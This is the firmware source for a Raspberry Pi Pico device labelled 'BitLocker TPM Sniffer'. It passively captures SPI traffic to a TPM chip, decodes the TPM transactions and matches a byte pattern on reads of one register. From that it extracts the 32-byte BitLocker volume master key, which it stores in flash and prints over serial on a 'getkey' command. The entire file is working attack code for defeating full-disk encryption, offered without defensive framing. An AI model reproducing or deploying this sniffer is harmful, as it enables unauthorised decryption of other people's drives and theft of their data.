#include <stdio.h>
#include <cstring>
#include "pico/stdlib.h"
#include "hardware/pio.h"
#include "hardware/clocks.h"
#include "hardware/gpio.h"
#include "hardware/flash.h"
#include "hardware/sync.h"
#include "hardware/irq.h"
#include "flash_storage.h"

// Include the PIO assembly code (generated by build system)
#include "spi_sniffer.pio.h"

// --- Hardware Configuration ---
// CRITICAL: These pins MUST match the hardcoded pins in spi_sniffer.pio.
// The assembly uses:
// 'wait 0 pin 0' for CS (Chip Select)
// 'wait 1 pin 1' for SCK (Clock)
#define PIN_SPI0_CS   0   // GPIO0 - MUST be 0
#define PIN_SPI0_SCK  1   // GPIO1 - MUST be 1
#define PIN_SPI0_MOSI 2   // GPIO2 - Configurable
#define PIN_SPI0_MISO 3   // GPIO3 - Configurable

// --- USB Serial Command Buffer ---
#define CMD_BUFFER_SIZE 64
static char cmd_buffer[CMD_BUFFER_SIZE];
static int cmd_pos = 0;

// --- Core State Machine ---
static volatile uint8_t state = 0;
static volatile uint8_t addr_bytes = 0;
static volatile uint32_t address = 0;
static volatile uint8_t xfer_size = 0;
static uint8_t data_buffer[64];
static volatile uint8_t data_count = 0;
static bool is_read_op = false;

// --- Live Stream Buffer ---
#define STREAM_BUFFER_SIZE 512
static volatile uint16_t stream_buffer[STREAM_BUFFER_SIZE];
static volatile int stream_head = 0;
static volatile int stream_tail = 0;
static volatile bool stream_active = false;

// --- Statistics ---
static volatile uint32_t transactions_processed = 0;
static volatile uint32_t keys_found = 0;

// --- Sliding Window (Matches Python Logic) ---
// Python WINDOW_SIZE is 0x2C (44 bytes)
static uint8_t window[44];
static int win_len = 0;

// --- Key Pending Buffer ---
static volatile bool key_save_pending = false;
static uint8_t pending_key[32];

// --- Global handles for PIO (needed for IRQ handler) ---
static PIO pio_handle;
static uint sm_mosi_handle;
static uint sm_miso_handle;

// --- Function Prototypes ---
void processSPIByte(uint8_t mosi, uint8_t miso);
bool checkAndStoreKey(uint8_t* buffer, int len);
void processCommand(const char* cmd);
void gpio_callback(uint gpio, uint32_t events);

// --- Main ---
int main() {
    stdio_init_all();

    // Disable stdout buffering for immediate output during stream
    setbuf(stdout, NULL);

    // Wait for USB serial
    while (!stdio_usb_connected()) {
        sleep_ms(100);
    }
    printf("\n=== BitLocker TPM Sniffer v2.4 (Fixed PIO JMP Syntax) ===\n");

    uint8_t boot_key[32];
    if (flash_retrieve_key(boot_key)) {
        printf("\n[!!!] STORED KEY DETECTED! Run 'getkey' to retrieve\n");
        for(int i=0; i<3; i++) {
            gpio_put(25, 1); sleep_ms(100);
            gpio_put(25, 0); sleep_ms(100);
        }
    }

    // --- GPIO Interrupt Configuration ---
    gpio_set_irq_enabled_with_callback(PIN_SPI0_CS, GPIO_IRQ_EDGE_RISE, true, &gpio_callback);

    // --- PIO Initialization ---
    PIO pio = pio0;
    uint sm_mosi = 0;
    uint sm_miso = 1;

    // Assign to global handles for callback access
    pio_handle = pio;
    sm_mosi_handle = sm_mosi;
    sm_miso_handle = sm_miso;

    // Load the PIO program
    uint offset = pio_add_program(pio, &spi_sniffer_program);

    // Helper function to configure a state machine
    auto setup_pio_sm = [&](uint sm, uint data_pin, uint cs_pin, uint sck_pin) {
        pio_sm_config c = spi_sniffer_program_get_default_config(offset);

        // Map PIN 0 in assembly to our specific DATA pin (MOSI or MISO)
        // sm_config_set_in_pins sets the base for IN instructions
        sm_config_set_in_pins(&c, data_pin);

        // --- Configure Pins ---

        // CS Pin: Used by WAIT instruction in PIO and JMP PIN.
        gpio_set_function(cs_pin, GPIO_FUNC_PIO0);
        gpio_set_input_enabled(cs_pin, true);
        gpio_set_pulls(cs_pin, true, false); // Pull up

        // SCK Pin: Used by WAIT instruction.
        gpio_set_function(sck_pin, GPIO_FUNC_PIO0);
        gpio_set_input_enabled(sck_pin, true);

        // Data Pin (MOSI/MISO): Must be PIO function for IN instruction
        gpio_set_function(data_pin, GPIO_FUNC_PIO0);
        gpio_set_input_enabled(data_pin, true);

        // CRITICAL: Set the Jump Pin to CS so that 'JMP PIN' in assembly works correctly
        sm_config_set_jmp_pin(&c, cs_pin);

        // Init the SM
        pio_sm_init(pio, sm, offset, &c);
        pio_sm_set_enabled(pio, sm, true);
    };

    setup_pio_sm(sm_mosi, PIN_SPI0_MOSI, PIN_SPI0_CS, PIN_SPI0_SCK);
    setup_pio_sm(sm_miso, PIN_SPI0_MISO, PIN_SPI0_CS, PIN_SPI0_SCK);

    // Main loop
    while (true) {
        // 1. Handle Serial Input
        int c = getchar_timeout_us(0);
        if (c != PICO_ERROR_TIMEOUT) {
            if (c == '\r' || c == '\n') {
                cmd_buffer[cmd_pos] = '\0';
                processCommand(cmd_buffer);
                cmd_pos = 0;
            }
            else if (cmd_pos < CMD_BUFFER_SIZE - 1) {
                cmd_buffer[cmd_pos++] = c;
            }
        }

        // 2. Process PIO Data
        while (!pio_sm_is_rx_fifo_empty(pio, sm_mosi)) {
            if (!pio_sm_is_rx_fifo_empty(pio, sm_miso)) {
                uint32_t raw_mosi = pio_sm_get(pio, sm_mosi);
                uint32_t raw_miso = pio_sm_get(pio, sm_miso);

                uint8_t mosi_byte = (uint8_t)(raw_mosi >> 24);
                uint8_t miso_byte = (uint8_t)(raw_miso >> 24);

                processSPIByte(mosi_byte, miso_byte);
            }
        }

        // 3. Handle Stream Buffer Drain
        if (stream_active && stream_head != stream_tail) {
            printf("DATA: ");
            int batch_count = 0;
            while (stream_head != stream_tail && batch_count < 16) {
                uint16_t entry = stream_buffer[stream_tail];
                uint8_t val = entry & 0xFF;
                if (entry & 0x8000) {
                    printf("[R]%02X ", val);
                } else {
                    printf("[W]%02X ", val);
                }
                stream_tail = (stream_tail + 1) % STREAM_BUFFER_SIZE;
                batch_count++;
            }
            printf("\n");
        }

        // 4. Handle Key Saving
        if (key_save_pending) {
            uint8_t local_key[32];
            memcpy(local_key, pending_key, 32);
            key_save_pending = false;
            uint32_t ints = save_and_disable_interrupts();
            flash_store_key(local_key);
            restore_interrupts(ints);
            printf("\n[[[ !!! KEY FOUND !!! ]]]\n");
            printf("Stored to Flash. Use 'getkey' to view.\n");
        }
    }

    return 0;
}

// CS IRQ Callback: Resets state machine if transaction ends prematurely
void gpio_callback(uint gpio, uint32_t events) {
    if (gpio == PIN_SPI0_CS && (events & GPIO_IRQ_EDGE_RISE)) {
        state = 0;
        pio_sm_clear_fifos(pio_handle, sm_mosi_handle);
        pio_sm_clear_fifos(pio_handle, sm_miso_handle);
    }
}

void processSPIByte(uint8_t mosi, uint8_t miso) {
    switch(state) {
        case 0: // TransactionState.READ_OPERATION
            is_read_op = (mosi & 0x80);
            xfer_size = (mosi & 0x3F) + 1;
            address = 0;
            addr_bytes = 0;
            data_count = 0;
            state = 1;
            break;

        case 1: // TransactionState.READ_ADDRESS
            address = (address << 8) | mosi;
            addr_bytes++;

            if (addr_bytes >= 3) {
                if ((miso & 0x01) == 0) {
                    state = 2; // WAIT
                } else {
                    state = 3; // TRANSFER_BYTE
                }
            }
            break;

        case 2: // TransactionState.WAIT
            if (miso == 0x01) {
                state = 3; // TRANSFER_BYTE
            }
            break;

        case 3: // TransactionState.TRANSFER_BYTE
            uint8_t data_byte = is_read_op ? miso : mosi;
            data_buffer[data_count] = data_byte;
            data_count++;

            if (stream_active) {
                uint16_t entry = data_byte | (is_read_op ? 0x8000 : 0x0000);
                int next_head = (stream_head + 1) % STREAM_BUFFER_SIZE;
                if (next_head != stream_tail) {
                    stream_buffer[stream_head] = entry;
                    stream_head = next_head;
                }
            }

            if (data_count >= xfer_size) {
                transactions_processed++;

                if (address == 0x00D40024) {
                    if (checkAndStoreKey(data_buffer, (int)data_count)) {
                        keys_found++;
                    }
                }
                state = 0;
            }
            break;
    }
}

bool checkAndStoreKey(uint8_t* buffer, int len) {
    if (len > 44) {
        int skip = len - 44;
        buffer += skip;
        len = 44;
    }

    if (win_len + len > 44) {
        int shift = win_len + len - 44;

        if (win_len > shift) {
            memmove(window, window + shift, win_len - shift);
            win_len -= shift;
        } else {
            win_len = 0;
        }
    }

    int space = 44 - win_len;
    int copy_len = (len < space) ? len : space;
    memcpy(window + win_len, buffer, copy_len);
    win_len += copy_len;

    if (win_len < 44) return false;

    for (int i = 0; i <= win_len - 44; i++) {
        if (window[i] != 0x2C) continue;
        if (window[i+1] != 0x00) continue;
        if (window[i+2] > 0x06) continue;
        if (window[i+3] != 0x00) continue;
        if (window[i+4] < 0x01 || window[i+4] > 0x09) continue;
        if (window[i+5] != 0x00) continue;
        if (window[i+6] > 0x01) continue;
        if (window[i+7] != 0x00) continue;
        if (window[i+8] > 0x05) continue;
        if (window[i+9] != 0x20) continue;
        if (window[i+10] != 0x00) continue;
        if (window[i+11] != 0x00) continue;

        memcpy(pending_key, &window[i + 12], 32);
        key_save_pending = true;
        win_len = 0;
        return true;
    }
    return false;
}

void processCommand(const char* cmd) {
    if (strcmp(cmd, "status") == 0) {
        printf("Transactions: %lu\n", transactions_processed);
        printf("Keys Found: %lu\n", keys_found);
    }
    else if (strcmp(cmd, "getkey") == 0) {
        uint8_t key[32];
        if (flash_retrieve_key(key)) {
            printf("[+] Stored BitLocker Key: ");
            for (int i = 0; i < 32; i++) printf("%02X", key[i]);
            printf("\n");
        } else {
            printf("[-] No key stored in flash\n");
        }
    }
    else if (strcmp(cmd, "erasekey") == 0) {
        flash_erase_key();
        printf("[*] Key erased from flash\n");
    }
    else if (strcmp(cmd, "stream") == 0) {
        stream_active = !stream_active;
        printf("[*] Streaming %s\n", stream_active ? "ON" : "OFF");
    }
    else if (strcmp(cmd, "stats") == 0) {
        printf("Window Len: %d\n", win_len);
    }
}
